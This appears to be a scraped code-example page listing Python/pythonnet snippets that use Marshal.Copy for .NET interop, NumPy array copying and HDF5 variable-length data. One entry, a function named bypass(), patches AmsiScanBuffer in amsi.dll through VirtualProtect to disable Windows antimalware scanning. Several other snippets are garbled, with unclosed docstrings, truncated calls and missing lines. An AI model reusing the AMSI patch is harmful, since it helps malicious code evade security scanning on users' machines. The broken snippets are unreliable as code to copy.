Beispiel #1
    def assertStringObjectHasDataBytes(self, strPtr, expectedBytes):
        strDataPtr = self.dataPtrFromStrPtr(strPtr)
        testLength = len(expectedBytes)
        writtenBytes = Array.CreateInstance(Byte, testLength)
        Marshal.Copy(strDataPtr, writtenBytes, 0, testLength)

        self.assertEquals(len(writtenBytes), testLength, "copied wrong")
        for (actual, expected) in zip(writtenBytes, expectedBytes):
            self.assertEquals(actual, expected,
                              "failed to copy string data correctly")
Beispiel #2
def _copy_double_array(src):
    '''A quick and dirty implementation of the fourth technique shown in for
    copying a .NET Array[Double] to a NumPy ndarray[np.float64] via a raw
    memory copy.

    ``int_ptr_tp`` must be an integer type that can hold a pointer. On Python 2
    this is :class:`long`, and on Python 3 it is :class:`int`.
    dest = np.empty(len(src), dtype=np.float64)
        src, 0,
    return dest
Beispiel #3
def bypass():
    asbSTR = Marshal.StringToHGlobalAnsi("AmsiScanBuffer")
    asbHandle = NativeMethods.LoadLibrary("amsi.dll")
    asbPtr = NativeMethods.GetProcAddress(asbHandle, asbSTR)

    old = Marshal.AllocHGlobal(4)
    prot = NativeMethods.VirtualProtect(asbPtr, 0x0015, 0x40, old)

    patch = System.Array[System.Byte]((0x33, 0xff, 0x90))
    unPtr = Marshal.AllocHGlobal(3)
    Marshal.Copy(patch, 0, unPtr, 3)
    NativeMethods.RtlMoveMemory(asbPtr + 0x001b, unPtr, 3)

Beispiel #4
 def _fetch_getdev(self):
     clist = self._clean_channel_list()
     if self._inbuffer is None:
         return None
     #This conversion is much faster than doing
     # v=array(list(buf.GetDataAsVolts()))
     buf = self._inbuffer
     fullsize = buf.BufferSizeInSamples
     validsize = buf.ValidSamples
     v = np.ndarray(validsize, dtype=float)
     Marshal.Copy(buf.GetDataAsVolts(), 0,
                  IntPtr.op_Explicit(Int64(, len(v))
     num_channel = len(clist)
     if num_channel != 1 and self.nb_samples.getcache() != 1:
         v.shape = (-1, num_channel)
         v = v.T
     return v
Beispiel #5
def writeVlenData(h5file):

    dtype = H5T.vlenCreate(H5T.H5Type.NATIVE_INT)

    array = range(16)
    npoints = len(array)
    shape = Array[Int64]((npoints, ))
    dspace = H5S.create_simple(shape.Length, shape)

    dset = H5D.create(h5file, 'Vlen Dataset', dtype, dspace)

    wdata = Array.CreateInstance(hvl_t, npoints)

    sizeofInt = 4

    for i in range(npoints):

        nElems = array[i] + 1
        nBytes = nElems * sizeofInt

        # the data to be written (array of length i+1 with all elements = i)
        data = Array.CreateInstance(Byte, nBytes)
        for j in range(nElems):
            Array.Copy(System.BitConverter.GetBytes(i), 0, data, j * sizeofInt,

        # allocate and copy to array in unmanaged memory
        mem = Marshal.AllocHGlobal(nBytes)
        Marshal.Copy(data, 0, mem, nBytes)
        wdata[i] = VLen(IntPtr(nElems), mem).To_hvl_t()

    H5D.write(dset, dtype, H5Array[hvl_t](wdata))

    # free unmanaged buffer space
    for i in range(npoints):
        vl = VLen(wdata[i])

    return None
    def test_pythonnet_array(self):
             OutputPrint=__name__ == "__main__")
        if sys.platform.startswith("win"):
            from src.ensae_teaching_cs.pythonnet import clr
            from System import IntPtr, Array, Double
            from System.Runtime.InteropServices import Marshal
            assert Double is not None
            assert Array is not None
            assert IntPtr is not None

            array = numpy.ones((2, 2))
            ar = clr.IntPtr_long(array.__array_interface__['data'][0])
            ar2 = Array[int]([0, 0, 0, 0] * 2)
            fLOG(type(ar2), list(ar2))
            Marshal.Copy(ar, ar2, 0, len(ar2))
def _copy_double_array(src):
    '''A quick and dirty implementation of the fourth technique shown in for
    copying a .NET Array[Double] to a NumPy ndarray[np.float64] via a raw
    memory copy.

    ``int_ptr_tp`` must be an integer type that can hold a pointer. On Python 2
    this is :class:`long`, and on Python 3 it is :class:`int`.
    # When the input .NET array pointer is None, return an empty array. On Py2
    # this would happen automatically, but not on Py3, and perhaps not safely on
    # all Py2 because it relies on pythonnet and the .NET runtime properly checking
    # for nulls.
    if src is None:
        return np.array([], dtype=np.float64)
    dest = np.empty(len(src), dtype=np.float64)
        src, 0,
    return dest
Beispiel #8
 def fillStringDataWithBytes(self, strPtr, bytes):
     strDataPtr = self.dataPtrFromStrPtr(strPtr)
     Marshal.Copy(bytes, 0, strDataPtr, len(bytes))
Beispiel #9
 def ptrFromByteArray(self, bytes):
     testData = Marshal.AllocHGlobal(bytes.Length + 1)
     Marshal.Copy(bytes, 0, testData, bytes.Length)
     Marshal.WriteByte(OffsetPtr(testData, bytes.Length), 0)
     return testData
Beispiel #10
def readVlenData(h5file):

    dset =, 'Vlen Dataset')
    dspace = H5D.getSpace(dset)
    npoints = H5S.getSimpleExtentNPoints(dspace)
    dtype = H5D.getType(dset)

    xfer = H5P.create(H5P.PropertyListClass.DATASET_XFER)
    acb = H5AllocCallback(allocCallback)
    fcb = H5FreeCallback(freeCallback)

    H5P.setVlenMemManager(xfer, acb, IntPtr.Zero, fcb, IntPtr.Zero)

    sel = H5DataSpaceId(H5S.H5SType.ALL)
    rdata = Array.CreateInstance(hvl_t, npoints), dtype, sel, sel, xfer, H5Array[hvl_t](rdata))

    sizeofInt = 4

    # Expected output:
    # 0
    # 1 1
    # 2 2 2
    # 3 3 3 3
    # 4 4 4 4 4
    # 5 5 5 5 5 5
    # 6 6 6 6 6 6 6
    # 7 7 7 7 7 7 7 7
    # 8 8 8 8 8 8 8 8 8
    # 9 9 9 9 9 9 9 9 9 9
    # 10 10 10 10 10 10 10 10 10 10 10
    # 11 11 11 11 11 11 11 11 11 11 11 11
    # 12 12 12 12 12 12 12 12 12 12 12 12 12
    # 13 13 13 13 13 13 13 13 13 13 13 13 13 13
    # 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14
    # 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15

    # compute the maximum length and create a managed buffer
    nBytes = 0

    for i in range(npoints):

        vl = VLen(rdata[i])
        nElems = vl.Length.ToInt64()
        nBytes = max(nBytes, nElems * sizeofInt)

    raw = Array.CreateInstance(Byte, nBytes)

    # copy from unmanged memory into managed buffer and read values
    for i in range(npoints):

        vl = VLen(rdata[i])
        nElems = vl.Length.ToInt64()
        nBytes = nElems * sizeofInt
        Marshal.Copy(vl.Pointer, raw, 0, nBytes)

        for j in range(nElems):
            print System.BitConverter.ToInt32(raw, sizeofInt * j),
        print ''

    H5D.vlenReclaim(dtype, dspace, xfer, H5Array[hvl_t](rdata))

    return None